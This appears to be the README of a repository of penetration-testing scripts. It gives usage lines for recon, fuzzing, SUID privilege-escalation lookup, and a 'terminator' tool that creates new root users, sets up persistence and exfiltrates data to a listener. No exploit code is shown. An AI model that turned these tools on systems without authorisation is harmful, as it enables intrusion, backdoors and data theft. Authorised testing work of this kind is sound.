Repo for various pentesting scripts to make life easier.
Get the scripts ready to use:
sudo bash setup.sh
Test each HTTP method on an endpoint to find potential BFLA (Broken Function Level Authorization) vulnerabilities
method-check -u https://domain.com/api/v2/users/1
Find active subdomains using subfinder, assetfinder, amass, httprobe, crt.sh, katana, and waybackurls.
subdomain-annihilator -d <domain.com>
subdomain-annihilator -f <domains.txt>
Search GTFOBins for privilege-escalation vectors for SUID files
binq <suid-files-list.txt>
cmd.py is a Python script that provides quick access to 50 pentesting commands for enumeration, exploitation, and privilege escalation.
cmds <target_ip>
Automate network scanning (discovery, ports, services, vulnerabilities)
nmapper <target_ip>
Automate web enumeration (subdomains, directory fuzzing, web vulnerabilities, etc.)
webrecon <domain.com>
Fuzzler is a penetration testing tool that generates tailored password lists from webpages using Artificial Intelligence/Natural Language Processing
fuzzler -t <target-ip> -p <target-port>
This script quickly downloads and runs the OWASP juice shop docker image for testing web/api vulnerabilities.
juice-up
This script attempts to take rows of raw data and format them into a markdown table (e.g. for Obsidian notes)
python3 md-table-gen.py [file-name] [delimiter char (optional)]
Fuzzler's final password list will be in 'fuzzes.txt'
Terminator: a tool for automating common techniques for the enumeration, privilege escalation, persistence, exfiltration, and reporting stages of a pentest
terminator usage:
(stage 1-enumerating target from local machine):
terminator enum -t <target_ip_to_enumerate> (optional: -w <path_to_directory_wordlist> (otherwise, terminator will use default list))
(stage 2-privilege escalation after gaining shell on target machine):
terminator priv -u <new_root_username> -p <new_root_passwd>
(stage 3-persistence/data exfiltration after gaining root privileges on target machine):
terminator root -u <new_user_name> -p <new_user_passwd> -l <local_ip> -x <local_listening_port> (optional: -f (bypass root permissions check))
(stage 4-create report on local machine):
terminator report -o <output_file_name>